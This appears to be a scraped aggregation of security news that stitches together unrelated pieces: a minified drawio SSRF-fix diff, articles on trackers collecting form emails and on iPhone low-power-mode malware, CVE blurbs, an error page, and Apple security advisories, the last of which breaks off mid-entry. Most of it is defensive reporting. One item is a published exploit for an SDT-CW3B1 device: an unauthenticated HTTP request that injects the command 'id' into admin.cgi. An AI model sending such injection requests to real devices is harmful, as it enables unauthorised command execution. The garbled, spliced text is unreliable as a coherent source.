Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.7.

@@ -468,7 +468,7 @@ a),DRAWIO\_GITLAB\_URL=a);a=urlParams\["gitlab-id"\];null!=a&&(DRAWIO\_GITLAB\_ID=a);w if("1"==urlParams.offline||"1"==urlParams.demo||"1"==urlParams.stealth||"1"==urlParams.local||"1"==urlParams.lockdown)urlParams.picker="0",urlParams.gapi="0",urlParams.db="0",urlParams.od="0",urlParams.gh="0",urlParams.gl="0",urlParams.tr="0"; "se.diagrams.net"==window.location.hostname&&(urlParams.db="0",urlParams.od="0",urlParams.gh="0",urlParams.gl="0",urlParams.tr="0",urlParams.plugins="0",urlParams.mode="google",urlParams.lockdown="1",window.DRAWIO\_GOOGLE\_APP\_ID=window.DRAWIO\_GOOGLE\_APP\_ID||"184079235871",window.DRAWIO\_GOOGLE\_CLIENT\_ID=window.DRAWIO\_GOOGLE\_CLIENT\_ID||"184079235871-pjf5nn0lff27lk8qf0770gmffiv9gt61.apps.googleusercontent.com");"trello"==urlParams.mode&&(urlParams.tr="1"); "embed.diagrams.net"==window.location.hostname&&(urlParams.embed="1");(null==window.location.hash||1>=window.location.hash.length)&&null!=urlParams.open&&(window.location.hash=urlParams.open);window.urlParams=window.urlParams||{};window.MAX\_REQUEST\_SIZE=window.MAX\_REQUEST\_SIZE||10485760;window.MAX\_AREA=window.MAX\_AREA||225E6;window.EXPORT\_URL=window.EXPORT\_URL||"/export";window.SAVE\_URL=window.SAVE\_URL||"/save";window.OPEN\_URL=window.OPEN\_URL||"/open";window.RESOURCES\_PATH=window.RESOURCES\_PATH||"resources";window.RESOURCE\_BASE=window.RESOURCE\_BASE||window.RESOURCES\_PATH+"/grapheditor";window.STENCIL\_PATH=window.STENCIL\_PATH||"stencils";window.IMAGE\_PATH=window.IMAGE\_PATH||"images"; window.STYLE\_PATH=window.STYLE\_PATH||"styles";window.CSS\_PATH=window.CSS\_PATH||"styles";window.OPEN\_FORM=window.OPEN\_FORM||"open.html";window.mxBasePath=window.mxBasePath||"mxgraph";window.mxImageBasePath=window.mxImageBasePath||"mxgraph/images";window.mxLanguage=window.mxLanguage||urlParams.lang;window.mxLanguages=window.mxLanguages||\["de","se"\];var mxClient={VERSION:"18.0.6",IS\_IE:null!=navigator.userAgent&&0<=navigator.userAgent.indexOf("MSIE"),IS\_IE11:null!=navigator.userAgent&&!!navigator.userAgent.match(/Trident\\/7\\./),IS\_EDGE:null!=navigator.userAgent&&!!navigator.userAgent.match(/Edge\\//),IS\_EM:"spellcheck"in document.createElement("textarea")&&8==document.documentMode,VML\_PREFIX:"v",OFFICE\_PREFIX:"o",IS\_NS:null!=navigator.userAgent&&0<=navigator.userAgent.indexOf("Mozilla/")&&0>navigator.userAgent.indexOf("MSIE")&&0>navigator.userAgent.indexOf("Edge/"), window.STYLE\_PATH=window.STYLE\_PATH||"styles";window.CSS\_PATH=window.CSS\_PATH||"styles";window.OPEN\_FORM=window.OPEN\_FORM||"open.html";window.mxBasePath=window.mxBasePath||"mxgraph";window.mxImageBasePath=window.mxImageBasePath||"mxgraph/images";window.mxLanguage=window.mxLanguage||urlParams.lang;window.mxLanguages=window.mxLanguages||\["de","se"\];var mxClient={VERSION:"18.0.7",IS\_IE:null!=navigator.userAgent&&0<=navigator.userAgent.indexOf("MSIE"),IS\_IE11:null!=navigator.userAgent&&!!navigator.userAgent.match(/Trident\\/7\\./),IS\_EDGE:null!=navigator.userAgent&&!!navigator.userAgent.match(/Edge\\//),IS\_EM:"spellcheck"in document.createElement("textarea")&&8==document.documentMode,VML\_PREFIX:"v",OFFICE\_PREFIX:"o",IS\_NS:null!=navigator.userAgent&&0<=navigator.userAgent.indexOf("Mozilla/")&&0>navigator.userAgent.indexOf("MSIE")&&0>navigator.userAgent.indexOf("Edge/"), IS\_OP:null!=navigator.userAgent&&(0<=navigator.userAgent.indexOf("Opera/")||0<=navigator.userAgent.indexOf("OPR/")),IS\_OT:null!=navigator.userAgent&&0<=navigator.userAgent.indexOf("Presto/")&&0>navigator.userAgent.indexOf("Presto/2.4.")&&0>navigator.userAgent.indexOf("Presto/2.3.")&&0>navigator.userAgent.indexOf("Presto/2.2.")&&0>navigator.userAgent.indexOf("Presto/2.1.")&&0>navigator.userAgent.indexOf("Presto/2.0.")&&0>navigator.userAgent.indexOf("Presto/1."),IS\_SF:/Apple Computer, Inc/.test(navigator.vendor), IS\_ANDROID:0<=navigator.appVersion.indexOf("Android"),IS\_IOS:/iP(hone|od|ad)/.test(navigator.platform)||navigator.userAgent.match(/Mac/)&&navigator.maxTouchPoints&&2<navigator.maxTouchPoints,IS\_WEBVIEW:/((iPhone|iPod|iPad).\*AppleWebKit(?!.\*Version)|; wv)/i.test(navigator.userAgent),IS\_GC:/Google Inc/.test(navigator.vendor),IS\_CHROMEAPP:null!=window.chrome&&null!=chrome.app&&null!=chrome.app.runtime,IS\_FF:"undefined"!==typeof InstallTrigger,IS\_MT:0<=navigator.userAgent.indexOf("Firefox/")&&0>navigator.userAgent.indexOf("Firefox/1.")&& 0>navigator.userAgent.indexOf("Firefox/2.")||0<=navigator.userAgent.indexOf("Iceweasel/")&&0>navigator.userAgent.indexOf("Iceweasel/1.")&&0>navigator.userAgent.indexOf("Iceweasel/2.")||0<=navigator.userAgent.indexOf("SeaMonkey/")&&0>navigator.userAgent.indexOf("SeaMonkey/1.")||0<=navigator.userAgent.indexOf("Iceape/")&&0>navigator.userAgent.indexOf("Iceape/1."),IS\_SVG:"MICROSOFT INTERNET EXPLORER"!=navigator.appName.toUpperCase(),NO\_FO:!document.createElementNS||"\[object SVGForeignObjectElement\]"!== @@ -11694,7 +11694,7 @@ D.appendChild(R);Q.appendChild(D);this.container=Q};var W=ChangePageSetup.protot this.format);null!=this.mathEnabled&&(this.page.viewState.mathEnabled=this.mathEnabled);null!=this.shadowVisible&&(this.page.viewState.shadowVisible=this.shadowVisible)}}else W.apply(this,arguments),null!=this.mathEnabled&&this.mathEnabled!=this.ui.isMathEnabled()&&(this.ui.setMathEnabled(this.mathEnabled),this.mathEnabled=!this.mathEnabled),null!=this.shadowVisible&&this.shadowVisible!=this.ui.editor.graph.shadowVisible&&(this.ui.editor.graph.setShadowVisible(this.shadowVisible),this.shadowVisible= !this.shadowVisible)};Editor.prototype.useCanvasForExport=!1;try{var U=document.createElement("canvas"),X=new Image;X.onload=function(){try{U.getContext("2d").drawImage(X,0,0);var u=U.toDataURL("image/png");Editor.prototype.useCanvasForExport=null!=u&&6<u.length}catch(D){}};X.src="data:image/svg+xml;base64,"+btoa(unescape(encodeURIComponent('<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="1px" height="1px" version="1.1"><foreignObject pointer-events="all" width="1" height="1"><div xmlns="http://www.w3.org/1999/xhtml"></div></foreignObject></svg>')))}catch(u){}})(); (function(){var b=new mxObjectCodec(new ChangePageSetup,\["ui","previousColor","previousImage","previousFormat"\]);b.beforeDecode=function(e,f,c){c.ui=e.ui;return f};b.afterDecode=function(e,f,c){c.previousColor=c.color;c.previousImage=c.image;c.previousFormat=c.format;null!=c.foldingEnabled&&(c.foldingEnabled=!c.foldingEnabled);null!=c.mathEnabled&&(c.mathEnabled=!c.mathEnabled);null!=c.shadowVisible&&(c.shadowVisible=!c.shadowVisible);return c};mxCodecRegistry.register(b)})(); (function(){var b=new mxObjectCodec(new ChangeGridColor,\["ui"\]);b.beforeDecode=function(e,f,c){c.ui=e.ui;return f};mxCodecRegistry.register(b)})();(function(){EditorUi.VERSION="18.0.6";EditorUi.compactUi="atlas"!=uiTheme;Editor.isDarkMode()&&(mxGraphView.prototype.gridColor=mxGraphView.prototype.defaultDarkGridColor);EditorUi.enableLogging="1"!=urlParams.stealth&&"1"!=urlParams.lockdown&&(/.\*\\.draw\\.io$/.test(window.location.hostname)||/.\*\\.diagrams\\.net$/.test(window.location.hostname))&&"support.draw.io"!=window.location.hostname;EditorUi.drawHost=window.DRAWIO\_BASE\_URL;EditorUi.lightboxHost=window.DRAWIO\_LIGHTBOX\_URL;EditorUi.lastErrorMessage= (function(){var b=new mxObjectCodec(new ChangeGridColor,\["ui"\]);b.beforeDecode=function(e,f,c){c.ui=e.ui;return f};mxCodecRegistry.register(b)})();(function(){EditorUi.VERSION="18.0.7";EditorUi.compactUi="atlas"!=uiTheme;Editor.isDarkMode()&&(mxGraphView.prototype.gridColor=mxGraphView.prototype.defaultDarkGridColor);EditorUi.enableLogging="1"!=urlParams.stealth&&"1"!=urlParams.lockdown&&(/.\*\\.draw\\.io$/.test(window.location.hostname)||/.\*\\.diagrams\\.net$/.test(window.location.hostname))&&"support.draw.io"!=window.location.hostname;EditorUi.drawHost=window.DRAWIO\_BASE\_URL;EditorUi.lightboxHost=window.DRAWIO\_LIGHTBOX\_URL;EditorUi.lastErrorMessage= null;EditorUi.ignoredAnonymizedChars="\\n\\t\`~!@#$%^&\*()\_+{}|:\\"<>?-=\[\];'./,\\n\\t";EditorUi.templateFile=TEMPLATE\_PATH+"/index.xml";EditorUi.cacheUrl=window.REALTIME\_URL;null==EditorUi.cacheUrl&&"undefined"!==typeof DrawioFile&&(DrawioFile.SYNC="none");Editor.cacheTimeout=1E4;EditorUi.enablePlantUml=EditorUi.enableLogging;EditorUi.isElectronApp=null!=window&&null!=window.process&&null!=window.process.versions&&null!=window.process.versions.electron;EditorUi.nativeFileSupport=!mxClient.IS\_OP&&!EditorUi.isElectronApp&& "1"!=urlParams.extAuth&&"showSaveFilePicker"in window&&"showOpenFilePicker"in window;EditorUi.enableDrafts=!mxClient.IS\_CHROMEAPP&&isLocalStorage&&"0"!=urlParams.drafts;EditorUi.scratchpadHelpLink="https://www.diagrams.net/doc/faq/scratchpad";EditorUi.enableHtmlEditOption=!0;EditorUi.defaultMermaidConfig={theme:"neutral",arrowMarkerAbsolute:!1,flowchart:{htmlLabels:!1},sequence:{diagramMarginX:50,diagramMarginY:10,actorMargin:50,width:150,height:65,boxMargin:10,boxTextMargin:5,noteMargin:10,messageMargin:35, mirrorActors:!0,bottomMarginAdj:1,useMaxWidth:!0,rightAngles:!1,showSequenceNumbers:!1},gantt:{titleTopMargin:25,barHeight:20,barGap:4,topPadding:50,leftPadding:75,gridLineStartPadding:35,fontSize:11,fontFamily:'"Open-Sans", "sans-serif"',numberSectionStyles:4,axisFormat:"%Y-%m-%d"}};EditorUi.logError=function(d,g,k,l,p,q,x){q=null!=q?q:0<=d.indexOf("NetworkError")||0<=d.indexOf("SecurityError")||0<=d.indexOf("NS\_ERROR\_FAILURE")||0<=d.indexOf("out of memory")?"CONFIG":"SEVERE";if(EditorUi.enableLogging&&

CVE-2022-1767: 18.0.7 release · jgraph/drawio@c63f3a0

Data harvested without consent and before forms are submitted in many cases, researchers claim

Data harvested without consent and before forms are submitted in many cases, researchers claim

Email addresses typed into online forms are often handed over to web trackers before being submitted and without user consent, a systematic study by computer scientists has discovered.

Email addresses – or identifiers derived from them – are apparently being used by data brokers and advertisers for cross-site and cross-platform identification of computer users.

As part of an investigation into how data from online forms is used for tracking, a team of four computer scientists measured the extent of email and password collection prior to form submission by analyzing the top 100,000 websites.

Catch up on the latest privacy-related security news and analysis

The researchers – Asuman Senol from KU Leuven in the Netherlands, Mathias Humbert (University of Lausanne, Switzerland), and Gunes Acar and Frederik Zuiderveen Borgesius (both from Radboud University, Belgium) – compared results from two vantage points, in the US and EU, as well as between mobile and desktop browsers.

**Tracking domains**

The team found that email addresses were exfiltrated to tracking domains before form submission and without giving consent on 1,844 websites in the EU crawl and 2,950 websites in the US crawl.

In the majority of cases, data was extracted to well-known tracker domains, but the researchers also identified 41 tracker domains omitted from popular blocklists.

Profiling for ad-serving purposes is not the only concern.

The researchers also identified seemingly inadvertent password collection from 52 websites by third-party relay scripts.

A research paper (PDF) based on the study is due to be presented at the upcoming Usenix ’22 security conference.

INSIGHT Research has come a long way, but gaps remain – security researcher Artur Janc on the state of XS-Leaks

Web users typically enter their email addresses into online forms for reasons including signing up to a service or subscribing to a newsletter.

The research shows that any data entered into such forms may end up in the hands of data brokers – sometimes even in cases where individuals have second thoughts about signing up to something and didn’t hit ‘send’.

The researchers used an online crawler to systematically examine what happens when users close their session before submitting data entered on forms.

**GDPR violation concerns**

Although not a lawyer, Gunes Acar, one of the four main researchers on the project, told The Daily Swig that the behavior of some of the websites may be in violation of stricter data privacy regulations such as the European Union’s General Data Protection Regulation (GDPR).

“Surreptitious email exfiltration for tracking purposes may breach some GDPR principles such as transparency, purpose limitation, and legal basis, but we cannot say for certain whether individual websites violate the GDPR (or other laws) without looking at the specifics,” Acar explained.

Almost half of the websites contacted responded to the researchers’ GDPR-related requests (see response sample here).

“Some websites said they didn’t know that their visitors’ emails were collected by third parties, and they fixed the issue,” Acar said. “That was the most positive outcome.

“Other websites informed us how they were using the emails collected through this behavior,” they added.

**Countermeasures**

Privacy-conscious internet users might well recoil from the revelations, as summarized in a blog post featuring screen captures and videos.

Fortunately, some countermeasures are already available.

Acar explained: “Adblockers (e.g. uBlock Origin) and privacy-focused browsers (Brave, DuckDuckGo) block requests to tracker and advertising domains, and hence may prevent this type of data collection. Only blocking the cookies wouldn’t provide any protection.

“Email relay services may be used to avoid giving the same email address to different online and offline businesses. Apple, DuckDuckGo, and Mozilla offer such services, which can be used to generate alias addresses,” Acer concluded.

The researchers have developed a proof-of-concept browser plugin, LeakInspector, which informs users when their email and passwords are scraped from forms, in addition to blocking “leaky” requests to tracker domains.

“Unfortunately, the add-on is not available on Chrome Web Store, because it relies on APIs that Google disallows in Manifest v3,” Acar said. “We are working on publishing the add-on to Firefox’s add-on repository.”

RECOMMENDED Facebook account takeover: Researcher scoops $40k bug bounty for chained exploit

Popular websites leaking user email data to web tracking domains

A use-after-free in Busybox 1.35-x's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the copyvar function.

'14781?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-30065: Invalid Bug ID

GPAC 2.0.0 misuses a certain Unicode utf8_wcslen (renamed gf_utf8_wcslen) function in utils/utf.c, resulting in a heap-based buffer over-read, as demonstrated by MP4Box.

CVE-2022-30976: gpac/gpac.1 at 105d67985ff3c3f4b98a98f312e3d84ae77a4463 · gpac/gpac

If you're an Apple user, make sure you patch for CVE-2022-22675, a zero-day flaw actively exported in the wild.
The post Update now! Apple patches zero-day vulnerability affecting Macs, Apple Watch, and Apple TV appeared first on Malwarebytes Labs.

Apple has released security updates for a zero-day vulnerability that affects multiple products, including Mac, Apple Watch, and Apple TV.

The flaw is an out-of-bounds write issue—tracked as CVE-2022-22675—in AppleAVD, a decoder that handles specific media files.

An out-of-bounds write or read flaw makes it possible to manipulate parts of the memory which are allocated to more critical functions. This could allow an attacker to write code to a part of the memory where it will be executed with permissions that the program and user should not have.

Attackers could take control of affected devices if they exploit this flaw.

CVE-2022-22675 is the same vulnerability that affected macOS Monterey 12.3.1, iOS 15.4.1, and iPad 15.4.1. The flaw for these was patched in March.

This latest batch of updates has improved bounds checking for additional Apple products running specific operating systems, particularly macOS Big Sur 11.6.6, watchOS 8.6, and tvOS 15.5. These OSs are installed in Apple Macs running Big Sur, Apple Watch Series 3 and later, and Apple TV (4K, 4K 2nd generation, and 4K HD).

Apple says it’s aware this flaw is currently being abused in the wild. It didn’t go into detail, likely to give customers time to patch up their Apple devices.

BleepingComputer has noted that attacks against CVE-2022-22675 might only be targeted in nature. However,if you’re using any or all of the above Apple products we mentioned, it is still wise to apply updates as soon as you can.

Stay safe!

Update now! Apple patches zero-day vulnerability affecting Macs, Apple Watch, and Apple TV

Researchers found a way to exploit the tech that enables Apple’s Find My feature, which could allow attackers to track location when a device is powered down.

When you turn off an iPhone, it doesn’t fully power down. Chips inside the device continue to run in a low-power mode that makes it possible to locate lost or stolen devices using the Find My feature or use credit cards and car keys after the battery dies. Now researchers have devised a way to abuse this always-on mechanism to run malware that remains active even when an iPhone appears to be powered down.

It turns out that the iPhone’s Bluetooth chip—which is key to making features like Find My work—has no mechanism for digitally signing or even encrypting the firmware it runs. Academics at Germany’s Technical University of Darmstadt figured out how to exploit this lack of hardening to run malicious firmware that allows the attacker to track the phone’s location or run new features when the device is turned off.

This video provides a high overview of some of the ways an attack can work.

The research is the first—or at least among the first—to study the risk posed by chips running in low-power mode. Not to be confused with iOS’s low-power mode for conserving battery life, the low-power mode (LPM) in this research allows chips responsible for near-field communication, ultra wideband, and Bluetooth to run in a special mode that can remain on for 24 hours after a device is turned off.

“The current LPM implementation on Apple iPhones is opaque and adds new threats,” the researchers wrote in a paper published last week. “Since LPM support is based on the iPhone’s hardware, it cannot be removed with system updates. Thus, it has a long-lasting effect on the overall iOS security model. To the best of our knowledge, we are the first who looked into undocumented LPM features introduced in iOS 15 and uncover various issues.”

They added: “Design of LPM features seems to be mostly driven by functionality, without considering threats outside of the intended applications. Find My after power off turns shutdown iPhones into tracking devices by design, and the implementation within the Bluetooth firmware is not secured against manipulation.”

The findings have limited real-world value, since infections required first jailbreaking an iPhone, which in itself is a difficult task, particularly in an adversarial setting. Still, targeting the always-on feature in iOS could prove handy in post-exploit scenarios by malware such as Pegasus, the sophisticated smartphone exploit tool from Israel-based NSO Group, which governments worldwide routinely employ to spy on adversaries.

It may also be possible to infect the chips in the event hackers discover security flaws that are susceptible to over-the-air exploits similar to this one that worked against Android devices.

Besides allowing malware to run while the iPhone is turned off, exploits targeting LPM could also allow malware to operate with much more stealth since LPM allows firmware to conserve battery power. And, of course, firmware infections are extremely difficult to detect since it requires significant expertise and expensive equipment.

The researchers said Apple engineers reviewed their paper before it was published, but company representatives never provided any feedback on its contents. Apple representatives didn’t respond to an email seeking comment for this story.

Ultimately, Find My and other features enabled by LPM help provide added security, because they allow users to locate lost or stolen devices and lock or unlock car doors even when batteries are depleted. But the research exposes a double-edged sword that, until now, has gone largely unnoticed.

“Hardware and software attacks similar to the ones described have been proven practical in a real-world setting, so the topics covered in this paper are timely and practical,” said John Loucaides, senior vice president of strategy at firmware security firm Eclypsium. “This is typical for every device. Manufacturers are adding features all the time, and with every new feature comes a new attack surface.”

_This story originally appeared on_ _Ars Technica__._

Your iPhone Is Vulnerable to a Malware Attack Even When It’s Off

Apple Security Advisory 2022-05-16-8 - Xcode 13.4 addresses a logic issue and a privilege escalation issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-8 Xcode 13.4

Xcode 13.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213261.

Git  
Available for: macOS Monterey 12 or later  
Impact: On multi-user machines Git users might find themselves  
unexpectedly in a Git worktree  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-24765: 俞晨东

IDE  
Available for: macOS Monterey 12 or later  
Impact: An app may be able to gain elevated privileges  
Description: This issue was addressed with improved checks.  
CVE-2022-26747: Mickey Jin (@patch1t)

Xcode 13.4 may be obtained from:  
https://developer.apple.com/xcode/downloads/ To check that the Xcode  
has been updated: * Select Xcode in the menu bar * Select About  
Xcode * The version after applying this update will be "Xcode 13.4".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC134ACgkQeC9qKD1p  
rhhvkA//TnfJPjjM0mtNqitNsvDFT6RrGrGwMkvIBy6GkkMIPYcdwGiGFOjwaZyj  
U53+wyHT6KMvgi78rsoeBIL3IqbZXh8XdXjVvwcUgvgDOzta+jk6FK04dxMQ4X74  
e41UtWuAvjnTGlmHbvMO/3fmKPQYFiGeyxS/U/q6Eh21JY1tBvcgF7Nwyw4jm+TS  
IDMJL8a8++1bRUts8wXlOj+Vh+mhCjDiLl0NXp61DQKF/dZQKYyMmVx/+eeXAjHw  
U2KrF2RZ+rfh/fyaacEJaqrz+HzAiFDE6c0swQugBr6yvL+usBHOw9FeVRjRRegQ  
9LwCKeRjbzZXTTaKiuwWzoYqJnyMtiUvnUPvhu2mSb/T06USxclSPE9IJt7+eEix  
/Qu32NUVeZC56tPc8zcbCXZuCRmBO/r0qudMt5ScjcqYlCn3ZUyslxwuZFutJXSw  
HN7UlSn7H5REEG+RPgjxCtvPiTRA4QSAqZDAVmSmDAR2uHSWhyx/WOxgd7ofckh5  
PUrHgFaKg/Xr9d1btemQ9h8H/h8UBxdM0yGv1v+Un2hDaoRNi0+uN12o1VI4W8m4  
yjoBkBcH1jr97t+WsMgacbOyPGcJQBLGP+smM8PoNFboDurt++3OiKaDvb42C+k7  
gwbf8apGlbGuiMq/BFhZWlrfJIKgJjq6ejDZtTFJ6PUb8EBQlHQ=  
=xRKW  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-8

SDT-CW3B1 version 1.1.0 suffers from a command injection vulnerability.

    # Exploit Title: SDT-CW3B1 1.1.0 - OS command injection# Date: 2022-05-12# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: 1.0.0# Vendor home page : http://telesquare.co.kr/# Authentication Required: No# CVE : CVE-2021-46422# Tested on: Windows# HTTP RequestGET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1Host: IP_HEREUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: */*Referer: http:// IP_HERE /admin/system_command.shtmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close

SDT-CW3B1 1.1.0 Command Injection

Apple Security Advisory 2022-05-16-7 - Safari 15.5 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-7 Safari 15.5

Safari 15.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213260.

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to code  
execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab  
WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

Additional recognition

WebKit  
We would like to acknowledge James Lee, an anonymous researcher for  
their assistance.

Safari 15.5 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TcACgkQeC9qKD1p  
rhjYBQ/+LNLAA17vZ+b2uQnKRb9rCwHHZQoSm0rjxXyzcUiZaeloZQ6KTsIidEdr  
JxuqDYjtV8OfSqsgz03z/iK3Ka4AEqM8GNvrX5LhZVqzXnY8K8XHnsi9Z/EfY6nf  
XfRGhPAw/9juxWzLA3ywIu8D9eql1zWEixk82awqNv1v4+Xym4Ff9rEmtSMdJ+9R  
i32E8erdN2GHcR9Dvn2ej/MA/M8YKT6Zxx2Uax4VDJstJdNctabwW1rNwr0Km1ut  
gD9PEWLb3UeKOcBt/2qWHpohWANixft8+p0SJAfU4uEldepi7dN2wHrkuLdGLOEs  
r54mTTbT8G98wYqcOizwfKTwrCb64hfrcgtB32UoSRGzl8wRfkSOdsXTmizow5BK  
YDu18P44K6oxe7X2PtMUEI22/TdJsp8xtgpjqX24GUjcuDb7ZN6zJ7RJijtlsraO  
144GM1L9upX/A5LFBFlmXXTRJ1KTHz1PDw1+WXZTD5FWCPGh6uj0HtdXWOcaaNa5  
uqi7lhc0JxezyKv2QL6/PY8s/811kWfLr1MtNL7nVEMyJX4o3s8yFF1k58KyEzhy  
+VrzGoHQF1y8dhhDGPUrv5fSaCxZ5da2ZDpwBxNZMHLh5sDddvUspGLUTKmQY66R  
FanqabJeytFLB3yfdMJEQ+qDf8N6KIkw1V3HJw4YJQnF8sleWfM=  
=Vm71  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-7

Apple Security Advisory 2022-05-16-6 - tvOS 15.5 addresses bypass, code execution, integer overflow, out of bounds access, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-6 tvOS 15.5

tvOS 15.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213254.

AppleAVD  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26702: an anonymous researcher

AppleAVD  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges. Apple is aware of a report that this issue may  
have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-22675: an anonymous researcher

AuthKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A local user may be able to enable iCloud Photos without  
authentication  
Description: An authentication issue was addressed with improved  
state management.  
CVE-2022-26724:  Jorge A. Caballero (@DataDrivenMD)

AVEVideoEncoder  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26736: an anonymous researcher  
CVE-2022-26737: an anonymous researcher  
CVE-2022-26738: an anonymous researcher  
CVE-2022-26739: an anonymous researcher  
CVE-2022-26740: an anonymous researcher

DriverKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

ImageIO  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend  
Micro Zero Day Initiative

IOKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A race condition was addressed with improved locking.  
CVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab

IOMobileFrameBuffer  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26768: an anonymous researcher

IOSurfaceAccelerator  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26771: an anonymous researcher

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An attacker that has already achieved kernel code execution  
may be able to bypass kernel memory mitigations  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious attacker with arbitrary read and write capability  
may be able to bypass Pointer Authentication  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

LaunchServices  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with additional sandbox  
restrictions on third-party applications.  
CVE-2022-26706: Arsenii Kostromin (0x3c3e)

libxml2  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

Security  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

WebKit  
